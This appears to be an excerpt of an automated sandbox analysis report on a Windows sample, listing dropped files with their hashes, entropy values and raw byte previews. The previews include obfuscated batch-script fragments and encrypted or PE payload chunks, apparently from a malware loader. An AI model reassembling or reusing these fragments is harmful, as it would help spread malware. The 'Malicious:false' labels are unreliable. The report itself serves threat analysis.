                                                                                  Preview:.8;.2V....q<.=...=......i.q.3.._.....+RK0,Z....;.....VXT....R......BL.$%4|..dJ......cb..,..g.$.T..q.7d..4.O...#..u..J...+.....<`.w.B.#..c.....=.......:.....e"<.}..(..~.I.N.V..l..,8...3..`@.M.2.......a.Qh.6......{.j.RD??V..1......x>.........eL.....cU....s.N4&.=.Q....T...l..e.#jH.....~...7..P...8..;....@...9...].TG`F...b........qDvT.&.6..^L..Y.-..\...}....'.d.@.~...D.%.{...5U....i.........,5.\..72...KX.q.."%9...kde.\j....y[q.3k_I.pI.h6......m...........:..$....;[..$..EZ..p....vr."....-F..NG..Xo..A..5.&"...i.QK.i.r...=+....{(m.]/.6...u:|...s.-...TF%m.tM`iN..l...Oy_...Y..... .i(. .kZH.:..u.%#J...$..-.../..].G..X...B?q.@.....Sa....tCD.Pr.j.Y.W.h..#=*).?I..#-...M....^L.>...yp.&._..../....s.....O.]26.-.g.1YVX.%_..D..H.. .......N...................G...-Y.cq.....;.t.xjb.\..{$..bRd....+O..z~.5......l5...;S<.bm..h..........#...8_m.L.MLng.K.< W.....R(.&....>Q..y..."..g.....w)F0..S.l..~.D..<....s..>..B.n=0.^S....`2.V.S.)...........D.q..}.lZ
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):228
                                                                                  Entropy (8bit):4.818005131696724
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:wWUqt/vllpfrYZcFTS9gXeF+X32ZpfW6MZCt7HINqCXjPYLEzClS6ufXCZNF:IqjvVg3F+X32+hZCt7HSbYwClS6CSNF
                                                                                  MD5:FCDE92646FF6C8858C7D14C72C9BF637
                                                                                  SHA1:6035E678601D7EE7889E7B2B8F08D6C0F0FCC853
                                                                                  SHA-256:7BEF0873884ECEE61479FA19C16B8BE130F8F3A6632E7DB21F64EAA29D1396D3
                                                                                  SHA-512:D3654CC54B2FAC9320D582C0FEC712F1BA4CF28638DF4308A9EE530EF7F8A65F4E1B0924526A237787DCF49F25F5478285390B1DEC14991031CB76297F1072D8
                                                                                  Malicious:false
                                                                                  Preview:Chosen........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h.
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:ASCII text, with very long lines (1118), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):24126
                                                                                  Entropy (8bit):5.086735322226342
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:MpflhioW9H63AbNLqivmNXvciF90p8hagNneJC5M3vtvGHXyQJm/EwaW0zG:8hoxEAbNOivqagNneQ5M3vtUXyj/QG
                                                                                  MD5:84506D06B109D7D9DC0839143B36C73D
                                                                                  SHA1:434AD989DF76562BF96E5D496E118BE25954812E
                                                                                  SHA-256:76EB7F16F100D734613B4C0DD65A8DA8687E483FC70AE22F8D3A098E5D4E310E
                                                                                  SHA-512:56D0D301ECC17C5D412A26DD54520A51033C00B63AAE5B191A7666E007C73AB1B473DEA7C154CC9D05D570D008ABD39F5B3B720DE36F576DEC408C8ECECC5835
                                                                                  Malicious:false
                                                                                  Preview:Set Graham=c..hPTommy-Teachers-Consultants-Stripes-Groove-Inter-Publication-Jeremy-..WRRomance-Oriented-..YcscWalked-Mini-Car-..puaGoto-Hitachi-Maritime-Satellite-Features-..wcSegment-Precisely-Governance-Herald-Ibm-Rainbow-Prairie-Bidder-Impressive-..iPBSingapore-Stories-Millions-Sun-Fell-Representation-Madness-Pleased-..Set Sorts=m..JbNotify-Clinics-Tops-Grave-Vb-If-Speeds-..SnxSilly-Tgp-..KCzPool-Workout-Proof-Addresses-Logical-Mods-..rBuComposed-Marriott-..hUYObtain-Asus-Collaborative-Was-Eye-..XPLQTemporarily-Calculate-Batteries-Orgy-Assigned-Salvation-..VozQGen-Entries-Instantly-Particles-Dryer-..LCqJTry-Examinations-..Set Mating=n..eeSs-Glossary-Acquisition-Upskirts-Species-Tell-..lEIMGossip-Sri-Th-Stop-Maximize-Transmission-Webshots-..XKmuLocator-Expressed-Step-P-Centered-..cGMAchieving-Humanitarian-Divisions-Carnival-Behaviour-Mauritius-..puCompetent-Precipitation-Alike-..UPgtObligation-Changed-Thumbnail-..vdDqImportant-Cells-Explanation-Benjamin-Pay-Dg-..Set Commonly=X..FBFsS
                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                  File Type:ASCII text, with very long lines (1118), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):24126
                                                                                  Entropy (8bit):5.086735322226342
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:MpflhioW9H63AbNLqivmNXvciF90p8hagNneJC5M3vtvGHXyQJm/EwaW0zG:8hoxEAbNOivqagNneQ5M3vtUXyj/QG
                                                                                  MD5:84506D06B109D7D9DC0839143B36C73D
                                                                                  SHA1:434AD989DF76562BF96E5D496E118BE25954812E
                                                                                  SHA-256:76EB7F16F100D734613B4C0DD65A8DA8687E483FC70AE22F8D3A098E5D4E310E
                                                                                  SHA-512:56D0D301ECC17C5D412A26DD54520A51033C00B63AAE5B191A7666E007C73AB1B473DEA7C154CC9D05D570D008ABD39F5B3B720DE36F576DEC408C8ECECC5835
                                                                                  Malicious:false
                                                                                  Preview:Set Graham=c..hPTommy-Teachers-Consultants-Stripes-Groove-Inter-Publication-Jeremy-..WRRomance-Oriented-..YcscWalked-Mini-Car-..puaGoto-Hitachi-Maritime-Satellite-Features-..wcSegment-Precisely-Governance-Herald-Ibm-Rainbow-Prairie-Bidder-Impressive-..iPBSingapore-Stories-Millions-Sun-Fell-Representation-Madness-Pleased-..Set Sorts=m..JbNotify-Clinics-Tops-Grave-Vb-If-Speeds-..SnxSilly-Tgp-..KCzPool-Workout-Proof-Addresses-Logical-Mods-..rBuComposed-Marriott-..hUYObtain-Asus-Collaborative-Was-Eye-..XPLQTemporarily-Calculate-Batteries-Orgy-Assigned-Salvation-..VozQGen-Entries-Instantly-Particles-Dryer-..LCqJTry-Examinations-..Set Mating=n..eeSs-Glossary-Acquisition-Upskirts-Species-Tell-..lEIMGossip-Sri-Th-Stop-Maximize-Transmission-Webshots-..XKmuLocator-Expressed-Step-P-Centered-..cGMAchieving-Humanitarian-Divisions-Carnival-Behaviour-Mauritius-..puCompetent-Precipitation-Alike-..UPgtObligation-Changed-Thumbnail-..vdDqImportant-Cells-Explanation-Benjamin-Pay-Dg-..Set Commonly=X..FBFsS
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):129914
                                                                                  Entropy (8bit):6.087421720563181
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:HhxjgarB/5elDWy4ZNoGmROL7F1G7ho2kOb:3garZ8aBZ2GmRq76tl
                                                                                  MD5:11BD51FA971C1276ECAE00673DD837E5
                                                                                  SHA1:7AC636664AE40E11320ADDC09C9B8B0CE7DA4207
                                                                                  SHA-256:A8D4115CC3CF5F812B7EE9EA1C8E470A43405A5FE2760F691DE1176FAD08752E
                                                                                  SHA-512:8CEEBE937A987EAE6996E7A01B7BCCCD0E54D09B89A964546A39E294082FF000F2C81B25D75B71F5695A1E5618558E531B7F454C091E7945D5B5A6085DA4A643
                                                                                  Malicious:false
                                                                                  Preview:s.s.3.2...m.s.c.t.l.s._.t.r.a.c.k.b.a.r.3.2...S.y.s.A.n.i.m.a.t.e.3.2.....m.s.c.t.l.s._.u.p.d.o.w.n.3.2...S.y.s.T.a.b.C.o.n.t.r.o.l.3.2...S.y.s.T.r.e.e.V.i.e.w.3.2...S.y.s.L.i.s.t.V.i.e.w.3.2...-.-.-.-.-...@.G.U.I._.D.R.A.G.I.D...@.G.U.I._.D.R.O.P.I.D...@.G.U.I._.D.R.A.G.F.I.L.E...Error text not found (please report)....Q\E.DEFINE..UTF16)..UTF)....UCP)................NO_AUTO_POSSESS)....NO_START_OPT)...LIMIT_MATCH=................LIMIT_RECURSION=....CR).LF).CRLF)...ANY)....ANYCRLF)....BSR_ANYCRLF)....BSR_UNICODE)....argument is not a compiled regular expression...argument not compiled in 16 bit mode....internal error: opcode not recognized...internal error: missing capturing bracket...failed to get memory...............=.......>.......?......$@......p@.......@.......A.......C................................................UGP.........text$di.............text$lp00AutoIt3.......['...text$mn.....'.......text$np....3'..6....text$x.i'.......text$yd.....(.......text$zy........s....text$zz..
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):87040
                                                                                  Entropy (8bit):6.693519362474099
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRus:zxrHSBRtNPnj0nEoXnmowS2u5hL
                                                                                  MD5:1A36E317EBEB7F01F600E97F5EB12B30
                                                                                  SHA1:A1D60DD976D7329D5B92836DDF320FDF1133E453
                                                                                  SHA-256:6613609608CC9B0E060B04A697C81AD869F247DBDD8BDFDDF73A9E866CADF3CB
                                                                                  SHA-512:0F219D07D39A903ED346D43E21D5291D3A62AC6309CA5C6CB3CAEA5F2A698CF051BD047E02D26B012B32FFCDD6764F68089C8F43835B52F4E88F279C20EA0CE2
                                                                                  Malicious:false
                                                                                  Preview:.M...?j)Zf9.........E.;E...{....l...j....L.....F..Y..u..........rj....L.....E..Y..u....... ..Uj....L.....E..Y..u.......0..8j....L....E..Y..u.......@...j....L....E..Y..u.......P..........=j...L....jE..Y..u........j...L....PE..Y..u(................].}.j(X.u.f9.w..I......}......E.3.M..R/..jN.....Q......-...E.Y....[/........U..N/..=....tl=.. .ta=..0.t?=..@.t,=..P...H/..j8^.E.M.+E.............M....Y3...E......./..j.Xj.f.E.3.X.U..M.f.E.../..j...j.3..E.....X.U.f.E......j..j...X.......P.......v..V...(....6.b...O.v.YY....}.3...`.......0....P.......Y.0....E....E...1..j.^..1..j.^.%1...M...U....*1..;..."1.......H.......E...t]f.|G.uuU...G.U.;U.t"R.U..........E.Y..8....E.E..U....U..t...+...f..G..H.....8....j5^.0..j.X...0..Q.....Y.0..j...j$^S.....Y.v...j.........E.Y.....0..3.f9P.uP..x.3.R..tx.f.Lx...(....S.Q.....j.....l........E.f.tx...x1;.p...~...p....u.f.H.j..H....,....E.Y..u..}..S0.......]...3.......H..-....E...G....C.....C..0...K........0....t3........f;.r7........
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):115712
                                                                                  Entropy (8bit):6.6355886862153035
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:i0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3h:nbfSCOMVIPPL/sZ7HS3h
                                                                                  MD5:026A05DA4CA3559CCBEE96E3E5A0FC27
                                                                                  SHA1:4B7A00966C781F275FC28D22A5EF2A1EF225138C
                                                                                  SHA-256:189664F109F51F6EABE4EADF261AB21AC5EE4C28387BD931BD49501C46973F8C
                                                                                  SHA-512:AB54B3FA23A6D9CCA3F13E42F721FC207C719FF9FABA3E067FF2AC02715666793677EB5C616DB0C57040055980CC3E653B63064E2240BA874EA2C5495C50AAF6
                                                                                  Malicious:false
                                                                                  Preview:M.^3.[..=....].....I..."M.....I..."M.....U..U.W3.f9:t!V..q.f.....f;.u.+.....J...f9:u.^.B._]..U..QSVW....I...3...tVV....YWWW..W+...SVWW....I..E...t4P..j....Y..t.3.PP.u.WSVPP....I...t...3...3.W.[..Y.....t.V....I._^..[..]..VW....I.....u.3..7SV.+...+......S.i....YY..t.SVW.?.....j..6[..YV....I.[.._^..U....S.]...u..$$............|VWj=S...S...E.YY..tN;.tJ.x...5..M.....E.;5..M.u.V........E.Y.5..M.3........9].t/9...M.t'..N....un.#...........W.Z..Y_..^[..]..t.3...j.j...}..S...M..kZ...5..M......t.9...M.u%j.j...}..S...M..BZ.....9...M.t..5..M...t..E..+.PQ......E.YY..xH9.tD.4...Z..Y.M.8].u..E.........D.....A9..u.j.QV.HX..S....Y........tX.P8].........E..H.;............?......j.QV..X..S...Y..............M....E.....\...5..M.9].........Q...A..u.+.j..A.P.E...|....YY..tG.u..u.V.aX.......u@.M..+E.A....E.......Y.#.PV....I...u...".......*...V..X..Y.a...SSSSS."W....U..QW.}...u.3.....3..9.t..@.A.8.u.V.A.j.P.s{....YY..te.?.tPS..+...Q...A..u.+.j..A.P.E..E{..j...;.X......<;.t,.7.u..4;
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):137216
                                                                                  Entropy (8bit):6.597272684213896
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:BOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioc:Q6AUkB0CThp6vmVnjphfhnvc
                                                                                  MD5:359BCA215485F8DF98B4E0687A0B3BDE
                                                                                  SHA1:4122AE38AE0A27F7DD4EE2CB0B9CCF38BE3C8524
                                                                                  SHA-256:F8F4061410EAB9A0BA5D7577BDBE74098695E0E43E8F8DF5341D742671B1B6FA
                                                                                  SHA-512:B2FF85F671C89DA192B9389284AF416AAA3A963ADFF920DC9E88A6E5B6A60A720A14E2F08BC3E1B691CC9597A788142DA19171C181826CF34586297F0F4BEDF8
                                                                                  Malicious:false
                                                                                  Preview:......c..Y..t.3.Cf.<w.u.CWF..c..Y;.r.]..].j.h8.K.W.B..........t9.}.SV.c..YPV.u.....I.9;~..;j.h8.K.j.............u.}..}.C...E..M....C..E..(.u.j.P.....W........_^[..U..SVW..45M........j.h..F.V...#M...|.I..M.;.t.W....._^[].U....V.u....\....uOV..P.I...u..=.#M..u;.M..u..~....E.P.M...[...E.45M.P.....h..I...._....M..s...3.@^......y........u.3.......U...$SV..M.W........M......3.U.SSS....l......U...SSS..l.....S.u..u..u..u.........M..........M......_^..[..Q....I....t...t....2..V..V.?|..Y..t.V.[|..Y..u.f..u.3.@^.3.^.U....SVW.}...3..E....#M.....t2...#M......I..E.3.E..}.PQ.E.Ph..F.QQ..........E..u..u.SP....I.....t.j.V...#M....l.I.V..`.I..=.#M..u........_^[..U....V......+...j...#..+.u..E.....#....M.E..E...E..E.P....I.^..V..f.>.......h.2L.V.a..YY..txh.3L.V.a..YY..tuh.yL.V.a..YY..u.j.X^.h.yL.V.a..YY..tEh.yL.V.sa..YY..t4h.yL.V.ba..YY..t.h.zL.V.Qa..YY..t.3.^..Il....t.3.@^..;l....t.j...S......t....t....t.2..j ..j...j.X3.QQQQP....I.....!......t....t....t.2..j@..j...j.X3.QQQQ
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):84992
                                                                                  Entropy (8bit):7.997717624907673
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:oeZhZDhvieZIr3jv1iG5cRYuQOaDenYpLWLidgk/yPQR7mKv5ftT:BhZ0o4TdiktuQzoNudIoR7mKhfJ
                                                                                  MD5:664CFA35657A413AEF85CC6F643235C6
                                                                                  SHA1:316B5C4F887D4F7A69499D73171308B9EEEEC7E2
                                                                                  SHA-256:B60CAC283C1F1C121E35D03B9CBF1A79CE754EFA7C1B1AABBF6F70980DDA1D61
                                                                                  SHA-512:649FEA55BDC2D395B317248C2C30E3276AC6C0CE716E5F842335016CAF23338E19A70682B6440D54B7EB4393FF6CC22182850FD98B4CE86C351E76F20463F1ED
                                                                                  Malicious:false
                                                                                  Preview:......+r{o.]m.F.d.*..& 'f./v...<.X...Uc..f[...l........$.SpQ.+...L..v......<Ss........f.1z.|AOZ...4.o.z..W0x.$l@..U......X..A..`.1A..~..7.Q'yu.;...'_.z<.....S4.xp..........K.2-.A..)...j...b....5...P......u...M6.......`]B./.gsB.F3p.Nu.=/I.(....%d.DR..8.J...A... .................K>....h;...%..`.M....^.Jbt..0!.r."5F.G..g=.f.3..ijy.{.Te...C6.Yd..(r....#.?.Ec.-u...\0..v.tu....L...#3.2..I)....U.Z.WF....5b..4.;R.d..].Z...p........Y.k...w(.R..Ae.B.......^..Q..u....S..E"..u....U<..MB.D.9&..4D...B....B..._........~6...h(N.@..u}...>W=..W..Q..!..&p...3....A..J.NG]...5D.s.NsW5..*X.$.....~.w.P-..U...k}b.u%j.=.....9.o6(.Nl.7.....=...3.f..].Y!...g\R.%4Az..V..p....]0....l.]^#mt...H.g.C........7D.G....E.]......qj.=u].B.~.7A....[.6.xs.t2s...#D(....-.My....H..+G._..\r....=d..X.?...dmZ.Oau.+.$.q.~...,.....`.......+.c8...`$f.#...2dbKie@.'.?1x4b0...M:F..`f.:....;.Y...f....._.8.>jY.L.".?.**.....$.&K&R1y5..K...7.$#....GK._V.Z..%...1iE.c...H......Lm...]..Qm..0..
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):59392
                                                                                  Entropy (8bit):7.997024505313728
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:wkCx/8+LKvddel4fFQjn4qlRqyh2rF7bn4sbNG77PfDCF:wkjdNQjuycrVbn4spK7Pf2F
                                                                                  MD5:2A452FE74151932E5E599994D7C70239
                                                                                  SHA1:0F3370406BD21AF1D26C73C0D8CF5B10C64AFC29
                                                                                  SHA-256:00A70934B7F5F308E923560D9E16FFDDDCC115DF336A3998EECA01B7097905F7
                                                                                  SHA-512:488CE3472485071AC846835F2252E83CD082474BF4D4E7DB1800CEFAC3C67D9A32A8B3C4A9AB6A7A2C081CC6C9F3C8D09FC8656C4D9845296C1F8C659B59D160
                                                                                  Malicious:false
                                                                                  Preview:.A_..C........|...R....]^..H..g.,.....H.....C1.C.D.+...K.v.......B..z...!0.O...._./..ex...Ib.'...nR,{....... ...,..8..cj.SD...0..9.t..87.....9OF.v}z.@.L9?...9.*..T'......n...A......-....ik|g.b..;[Ki.O...U7..q.....an.U_..Y....u..f.;.p.Y....<`7J.\.n.'8....$.+../f),1....RV..zn.'._$....Jpvg.......(V..I..U.....e.k....R0.. 3@.n...vu....R\.C.t.'^.G.+..0.L.)..b}v...b..u.n.>....w. z...M.u....5..$....~.Bc3..&..-...J..T3g..2.&.=..g...{...eH...F..?.......b....C..".<_......~7..{^....J..X7...c.....N..@.).,....}......0..."S.6.......q.D..).......)....Ur..J.M......:o....M[T'........O.B`......Q.h9.{.y_i...}.z.M.. .).9.Ia~...Y...[..n..d..._.z..S%..9..l...M2...U.(.??..y.............D`.5<{].....0'...I~TOiV.:.xb..|...S.`...Q.wC....,..d..!7...U<.7;*...?.0...k.I......Ap.N....s.9}.......a.....5..+"..J<^y=QWA....>JP.n...N..&....'...4=.f..+^W../.j#T>...>.d...V...>C.&....... .+.3.'A...)\>@4o.c....A.z>.$..r.Q....K(...{.....@...^....h..Q.?N1[.....6....S..h..c..V.I?....b&..
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):58368
                                                                                  Entropy (8bit):7.996743277226256
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:eQ2Bl1h0EETOfae6Y40x6YHu3a+vqX88xB:efzw4qJYoC88xB
                                                                                  MD5:5055EE8CB0DA98C3C39E96C4A4088C0D
                                                                                  SHA1:60C6BA91201B7813F674F955CC51AE684A51838F
                                                                                  SHA-256:221C670740C26CAC8EEFA85DDB50D9314935B5CB63C857F520EC18053C53DD31
                                                                                  SHA-512:D73A72BFA3170D435543F8D23794CF674A5D0475701098B756362EBFECF8DC840B1782311B21FBA48E398B61B8D8E2C2E3CA1E8E4FA958C83FB319A56806FCEC
                                                                                  Malicious:false
                                                                                  Preview:...\.,...V.......T...*4......p.K.2lV.ss..sF.D.Els...v....cI..`..2..m.....,'...G..J.fs....O...............D..s..'$...2C.d.Il:uq.../s.u.|.P.$.we......G..?..d7.....u.R@.^u..\.T.b&....{Z~...=.$...<q....$.O...;..R44y/......wX*..U.&...0.fG.Sz.T...n.g.p.~.(^".|.Xrt..M,0............6..Js-..7*....H..o.A..s3&...`......Fa.!..z.K|.eJ....L.##_...tlC.%^.f.3b.lK.<..~.:c-..0.I3.y..P.{C.4.NyU..L/a.eq9..\/.4."....Sb.Y3...\'s...JT.c.i.......z*oeG..B&p8.}.jP...M..b.$..k.y;..EV..*..{....$=.EQ+....dW....rD.y/.....g..t.=..9.....l'.".|fP..E.|....._.q!b.....G.#*cJ..L..q..[..........w.....Q=Xi.^.R..Q........{.;T_.d...&q..$~8.p..{1x.?.O@..DC..S.sQ.....=.U:.....\.....%...)g....z..INs...e.CZ.....Hm.@?8.v....Wa. ..N.9Q. i.].e.......R..w...F.s.N..W.x......w..5p.`...1}Sa[}QL....o.(...g..T=...%.Q_.c.|L4..T..8..!l...Z.Hw.]f..7.j/..A2.\....B........r.o8O..Q..1..3.....&......3.....$.V....iJ.........P[.,..F...Z....6.Y..-f,..\.W..)0.V..n...D~&...q@E<.$M.J...O..%
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):91384
                                                                                  Entropy (8bit):7.998111616463107
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:ymd7XKNgmUd//3s7yYTe5h0GG09Q0XKI1fxGvM3PI6fsfzlwpTgY+IhhyBgKoPVz:lqgmUF/cmiefHXKItkmPfsfzWpU6qgdF
                                                                                  MD5:C71881C4532C63EFFD02808F037DE211
                                                                                  SHA1:097283DC3BF33937A2BDB348791070E24E132525
                                                                                  SHA-256:9175D28F49BF4CDD5F91FEF049387C8B2D1D4F90F528F75CAC67731F0E6E4A77
                                                                                  SHA-512:A4EF200E4EA6D119DFAE7C163629B5FFC72364AE4CB2546665A93D00B37F27206903FCA87CE4467648C8EA010AB0249D5197A10D17528E33C33CA91CCD827970
                                                                                  Malicious:false
                                                                                  Preview:..-.4......Y$..-...Z3. .@.....WHn...B............_.QmDK9N...b.PK.>.......3zH.B.so.e..G.`.#......T!G...X\...L......x|8E].p.e{...].i?...f.....Q..{M{.P......a0.U..-..H+A.:.D..76(..X...K.$`.f.......O...nj..)Y...(....g..tZ.0...2.,..-..........p...HK..x_.K......k.&.k.s).E2-..5.`....A7...TN.........V..."..q.^:@w....B<.L>.1V.0.....|2T..........w8r.oX..{1..nS.'...m.P*o?q..iv. b......&.p...?......$....R..~..U...TtO."...Or.e.'iW^.9.I....H.r].....T.8Q.pu..t....9..|9...~.v...:.p...w.....I]:7.V.+..0...Uc..t........q......W;\z.]g..KX.......=,U........{....D.O...1;.^...v.]..L.Z..(... ....V.. ......f;8..H...E.....G.......h.ob_^..u.X.....y.t.\y..,M.M..3N.!9....@.}.\w..K.v.:..O.f...?.g..~.Wk..s6.......1b....@..W.i.Y.s.....|8S..d..24.-R....xr2..|....8B4_..<D.......<n.&g.j[.G..2..~V;^iW5f.D..._0.....H...o.....1....r......o*..g.[.n.....H|.;.r ...c5V..T .=4.M.....@.x.0.....(?.2...C\..+..a.`.....p.U....t.....8.....E..6J.X.x+Rtg[.xp..@C...S.I.V.3...i...{!..9
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):125952
                                                                                  Entropy (8bit):5.536176418145287
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:FKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTd:F8QuklMBNIimuzaAwusPdKaj6iTcPAs4
                                                                                  MD5:559D4F0DEA25FE10E552C77F2E1B716C
                                                                                  SHA1:9A67E889666472700D71E783F8E85794D3A9945D
                                                                                  SHA-256:656587B8CA8C26785B3B59059DC1E3373A1A9BF2B6E253EA8A04C5263E7511C1
                                                                                  SHA-512:859A4B6EF35F5535C8A0F9B3A26E715668FDD626B953DA3A6E0044DBD1012B23EF420CF204C3812710B96EC216C444A269929953ABCF9A2C883BA06F239A6C3E
                                                                                  Malicious:false
                                                                                  Preview:..<(...`.<...77...b. ..<ON..}..'.+..q<.........X4m.<d.]{f.......|'.<\%>..U...Zsn.i.<..yUk....3.w..<..Z.......-.f$.<..O..3.........<F^..v....._...t<..K........0.ns<.R......Y....<K.W..g..h..l,kg<i... ......6.p.<{..J-.....=...t<.....X......PZ.<.2.......J.s..<^.{3.....:`..t<.?...P..&I..'o.<........ .A..<'Za.......1.d.<@En[vP....M;.w<..............?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.......?.....B.?.....B.?.......?.......?.....r.?.....r.?.......?.......?.......?.......?.....N.?.....N.?.......?.......?.......?.......?.....B.?.....B.?.......?.......?.......?.......?.....H.?.....H.?.......?.......?.......?.......?.....b.?.....b.?.......?.......?.......?.......?.......?.......?.....F.?.....F.?.......?.......?.......?.......?.......?.......?.....B.?.....B.?.......?.......?.......?.......?.......?.......?.....V.?.....V.?.......?.......?.......?.......?.......?.......?.....z.?.....z.?.....F.?.....F.?.......?.......?.......?.......?......
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):82944
                                                                                  Entropy (8bit):6.681948730926329
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:f/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cp:fgF4qv+32eOyKODOSpQSAU4Cp
                                                                                  MD5:48D977581D70B4D8EB274100C5C7AB0B
                                                                                  SHA1:8E007EE20BB4E9154F65516DAD309D773054CD3D
                                                                                  SHA-256:CD4A445BDEBD3B5CF3425306F0DB7FC8F88FC09116FA725101AFE66B9C3E3B53
                                                                                  SHA-512:3B97B910D03ACC43823B1D959F06054A96F97561FE0FCBA0900ED2D998D928CA64A8EDBD04078D438A11B9195EBDAEB6711ABBC140EB66187B37B5596875F2F0
                                                                                  Malicious:false
                                                                                  Preview:..F.P.v8..H....v4.+....M..._^3.[.......].....U..QQSV..W.~<.uV.F8..~O.^43...t^3.f.E..F.P...p..E.SP.........E...~..N.Q.u...H....}....].G;~8u....N.....v..F.P.v8..H....v4. ..._^..[..].....U..QQSV..W.~<.uV.F8..~O.^43...t^3.f.E..F.P...p..E.SP.j.......E...~..N.Q.u...H....2....].G;~8u....N.....v..F.P.v8..H....v4."..._^..[..].....U..QQS....@......t....x..u..M..E....[.E.V.u.W.}...E....&..M.;.t2.E.P.....P......E..8.u..>*u.Pj?........E.G;}.u.M..>.u...t..._^[..].....U..QQS....@......t....x..u..M..E....^.E.V.u.W.}....&...G.M..E.;.t4.E.P.....P......E..8.u..>*u.Pj?........E....;}.u.M..>.u...t..._^[..].....U..QQS.]...W.E....#....M..z.9z.u..z..t..M..E....Q.E.....L+z..E.;.r...V.4?V.u..2......M.......0..^.x....x...E.t..M.....;}.t.......8.M..;.u...t..._[..].....U...,.E..U..M..E..E..E..E..E.E..M.U..E..u..Df.........L..........t.E..E.E..E.E.E.E.E..E..E.E.PR.!...YY..]..U...,.E..U..M..E..E..E..E..E.E..M.U..E..u...e...................t.E..E.E..E.E.E.E.E..E..E.E.PR....YY..]..U...u
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):7.998206684154131
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:zQ6z2OYzCfk/VR8C1LTvuVriB43WcakZHJpbNQL5OuUzBzj4RrULF8lXgA:EkYzUs8C9vucB4Gcakrx+L5OtMULkgA
                                                                                  MD5:BDC13282C79460C2BA1E0EF20F4E5E81
                                                                                  SHA1:CF8AFB3ED54647E5C40E255E10D25B2995D48EED
                                                                                  SHA-256:599E91B463FAAA46F894FDF81F2835BD78317573EB0D68F43A152187FB6E0D4C
                                                                                  SHA-512:9E54618E9C966B3B6083807C7A3EF524141D5890C00C9E779EEF2B632921BB9F7258B91DB6854CAE0B373637A1989DFE85DA98CA680055E1359BC31BE00133CD
                                                                                  Malicious:false
                                                                                  Preview:..S..Z....*.)F .r.^.o..QW...r.@..Gt...G...a...gbv.....~......$.E..c.....k...P7Q.A.T......k.E....q..wZ.........Sn...X.!....u...........;g[%.Uj..R..K.Zf!yL.H5.o....?.....X}:......:..d..U ..>..(&.5.......z......D..\8.....<..B.3....&N.I..*z...$...c......b.....q=kvL...ZS.Zs..j..*....G.....t%......fiRs!....*.....(.;!..>..yI....(D....T_A.e5 v/.._.X.?:)`......-......r....8D.pU.. `.=<..T.a....S...CB...P.v.{;...o.<.h2]./.# .........p._*.RU"..h.=3....B.....;DL.{LGI.U.,....e:[."a0i.U....`.#bOy. ....&8.n........yk......1]..8W....s$q.5#.....N6.N..~..o..2..p'.~r.,...Z0^...O.....4.gS-.k......z:...|..U..........g{Zs3T@..'.......u....}!.:. ..W3x{.....SB.C>~<..^.{ .jwD..vA..0.....p...[.z...$."<"5..6._.Zx.KhX...)..3{.L.M..=....?f...N...9..>u.'{.@p.......1..iS89>.tw.t..r|...wW...8...[=.N.,.\.K{.,......\.+..u......<.X3?.5.h!..@.f:......2...l6a.0..j.nGW72r".....2..1....?`,U.c@...7....k..(g.Q6.m_.).[.....xl.o..t=9.g._.%o.V..j.Q.(8.#y.wZ.....U7.i.F.../......(....
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
